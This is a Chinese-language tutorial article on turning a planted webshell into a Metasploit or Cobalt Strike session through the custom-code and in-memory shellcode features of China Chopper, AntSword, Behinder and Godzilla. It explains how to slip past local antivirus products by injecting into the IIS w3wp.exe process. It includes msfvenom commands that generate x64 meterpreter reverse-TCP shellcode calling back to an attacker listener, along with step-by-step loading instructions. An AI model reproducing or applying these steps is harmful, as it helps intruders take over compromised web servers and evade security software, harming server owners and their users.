常用Webshell管理工具上线利用方式

简介: 常用Webshell管理工具上线利用方式


前言

这篇文章我们主要介绍的是如何利用常用Webshell管理工具中的自定义代码执行功能来上线MSF,附带了中国蚁剑、冰蝎和哥斯拉的内存加载上线,实战渗透中如果遇到以下场景时可尝试文中方法绕过。


利用场景

仅支持ASP,WScript.Shell、Shell.Application组件被卸载;又或者支持ASP.NET,但是存在有某些安全防护软件(360、云锁、安全狗等),在这两种场景下可能无法执行命令、上线和提权等。


注:目前国内大部分安全防护软件都会对某些进程或进程链的监控较为严格,如果遇到这类场景时可尝试使用以下方式来绕过,但过不了D盾,因为Hook掉了一些上线所需的API,其他防护软件还请自测。


0x01 中国菜刀

中国菜刀中并没有直接上线和shellcode加载功能,但是有一个自定义代码执行,我们可以利用这个功能来获取MSF会话。


选择对应Webshell -> 右键“自写脚本”-> 执行ASP脚本上线。


0x02 中国蚁剑

中国蚁剑和菜刀一样,也可以利用As-Exploits后渗透插件中的执行自定义Payload功能来获取MSF会话。


选择对应Webshell -> As-Exploits -> 执行自定义Payload -> 执行ASP脚本上线。


如果目标主机支持ASP.NET和JSP脚本,我们也可以利用As-Exploits插件中的ShellCode加载器功能来上线CS或MSF,只需生成hex格式的shellcode即可,c、csharp的还需要做些处理。

    msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.120 lport=443 -f hex


    注:JSP内存加载方式有两种:JNA、Attach,JNA只需要X86的ShellCode即可,而Attach需要根据目标Java位数来选择对应的ShellCode,更多注意事项可在As-Exploits插件中查看。

    0x03 冰蝎

    冰蝎不仅可以利用自定义代码执行功能来获取MSF会话,也可以使用反弹shell功能来获取CS/MSF会话,但是不支持ASP脚本。


    连接Webshell -> 自定义代码 -> 执行ASP脚本上线。


    利用反弹shell功能获取会话时只需在Metasploit、CobaltStrike工具中设置好监听,然后在冰蝎客户端中填写VPS监听的公网IP地址和端口就行了,这也能用于目标不出网等场景。


    注:反弹shell中的Meterpreter和Shell内置的是x86的shellcode,不可自定义shellcode,如果IIS应用池为64位时可能无法上线,更换x64的Payload也不行,但可以反弹CobaltStrike。


    0x04 哥斯拉

    目标仅支持ASP脚本时我们可以利用哥斯拉中的代码执行功能来获取MSF会话,加密器用的ASP_RAW,其他的加密器还请自测。


    连接Webshell -> 代码执行 -> 执行ASP脚本上线。


    如果支持ASP.NET脚本时我们也可以利用内存加载中的ShellcodeLoader、Meterpreter来获取会话,哥斯拉会根据IIS应用池位数来加载对应的shellcode,不会出现x64上线不了等情况。


    利用ShellcodeLoader获取会话时需要先生成一个C的shellcode,将\x"及多余字符都删掉,只需留下hex shellcode即可,然后再依次点击load加载和run运行就能获取到会话。

      msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.120 lport=443 -f c


      注:ShellcodeLoader、Meterpreter都是在w3wp.exe进程下重新创建一个新的rundll32.exe,所以这过不了安全狗“禁止IIS执行程序”,提示Cannot create process errcode:5

      0x05 文末小结

      本文介绍了4个常用Webshell管理工具的上线方式,都是注入到进程内存中去执行的,1种是注入到w3wp.exe进程;另1种是注入到指定进程,但是是由w3wp.exe创建的子进程,如果防护软件对w3wp.exe进程监控较为严格时则可能无法利用,如安全狗“禁止IIS执行程序”、云锁“操作系统加固”等防护功能。

      相关文章
      |
      安全 小程序 PHP
      PHP代码审计(七)Rips源代码审计系统使用教程
      上一篇中提到的Seay源代码审计系统是由C#编写的winform程序,现在已经停止更新了,但是,还是比较好用的。 PHP代码审计还有另一个工具,也是一个神器Rips
      320 0
      |
      安全 小程序 PHP
      PHP代码审计(六)Seay源代码审计系统使用教程
      www.cnseay.com/ 当然,这个已经不能访问了。 软件的版本比较早,需要.NET framework3.5框架,我这里是软件启动的时候自动提醒安装,如果没有自动提醒,那么你需要手动安装.NET frameWork3.5框架,否则,程序应该是没有办法运行。
      1188 0
      |
      11天前
      |
      监控 安全
      公司用什么软件监控电脑:Lua 脚本在监控软件扩展功能的应用
      在企业环境中,电脑监控软件对保障信息安全、提升效率至关重要。Lua 脚本在此类软件中用于扩展功能,如收集系统信息、监控软件使用时长及文件操作,向指定服务器发送数据,支持企业管理和运营。
      29 6
      |
      存储 安全 开发者
      企业用WordPress开发插件需要定期更新吗?
      企业使用WordPress开发插件时,需要定期更新插件以确保插件的安全性和兼容性。 插件开发者会定期发布更新来修复漏洞、改进功能和确保兼容性。如果插件没有及时更新,那么它可能会存在漏洞或与最新版本的WordPress或其他插件不兼容,从而导致安全和性能问题。除了定期更新插件以确保安全性和兼容性,企业在使用WordPress插件时还有以下一些最佳实践:
      |
      缓存 安全 测试技术
      thinkphp 漏洞修复方案之<6.X版本的代码漏洞案例分析
      大年初五,根据我们SINE安全的网站安全监测平台发现,thinkphp官方6.0版本被爆出高危的网站代码漏洞,该漏洞可导致网站被植入网站木马后门文件也叫webshell,具体产生的原因是session ID参数值这里并未对其做详细的安全过滤与校验,导致可以远程修改POST数据包将session的值改为恶意的后门代码,发送到服务器后端并生成PHP文件直接生成,可导致网站被攻击,服务器被入侵,关于该thinkphp漏洞的详情,我们SINE安全来跟大家分析一下。
      534 0
      thinkphp 漏洞修复方案之<6.X版本的代码漏洞案例分析
      |
      安全 Unix Linux
      用于Linux服务器的自动安全审计工具
      用于Linux服务器的自动安全审计工具
      用于Linux服务器的自动安全审计工具